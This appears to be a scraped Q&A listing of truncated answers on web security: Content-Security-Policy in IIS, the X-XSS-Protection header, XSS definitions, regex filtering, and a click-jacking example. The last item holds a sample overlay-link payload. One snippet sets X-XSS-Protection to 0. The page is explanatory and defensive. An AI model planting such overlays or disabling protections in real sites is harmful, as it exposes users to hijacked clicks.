Config your IIS server to use the “Content-Security-Policy” header

From Ian Oxley’s Sitepoint article – Improving Web Security with the Content Security Policy, it would seem that you define your Content Security Policy (and, in turn, populate those headers) directly in your IIS configuration file. The example given in the linked post, <system.webServer> <httpProtocol> <customHeaders> <add name=”Content-Security-Policy” value=”default-src ‘self’;” /> </customHeaders> </httpProtocol> </system.webServer> demonstrates … Read more

how to set Http header X-XSS-Protection

I doubt it’d work as just a meta tag. You may have to tell your web server to send it as a real header. In PHP, you’d do it like header(“X-XSS-Protection: 0”); In ASP.net: Response.AppendHeader(“X-XSS-Protection”,”0″) In Apache’s config: Header set X-XSS-Protection 0 In IIS, there’s a section in the properties for extra headers. It often … Read more

What is cross site scripting?

With cross-site scripting, it’s possible to infect the HTML document produced without causing the web server itself to be infected. An XSS attack uses the server as a vector to present malicious content back to a client, either instantly from the request (a reflected attack), or delayed though storage and retrieval (a stored attack). An … Read more

Best regex to catch XSS (Cross-site Scripting) attack (in Java)?

Don’t do this with regular expressions. Remember, you’re not protecting just against valid HTML; you’re protecting against the DOM that web browsers create. Browsers can be tricked into producing valid DOM from invalid HTML quite easily. For example, see this list of obfuscated XSS attacks. Are you prepared to tailor a regex to prevent this … Read more

XSS attacks and style attributes

This does not work due to click-jacking vulnerability. Example: <a href=”http://example.com/attack.html” style=”display: block; z-index: 100000; opacity: 0.5; position: fixed; top: 0px; left: 0; width: 1000000px; height: 100000px; background-color: red;”> </a> Found at: http://www.bioinformatics.org/phplabware/forum/viewtopic.php?id=164 The code would be perfectly validated but it may cause serious damage. So – rule of thumb use very strict white list … Read more

Hata!: SQLSTATE[HY000] [1045] Access denied for user 'divattrend_liink'@'localhost' (using password: YES)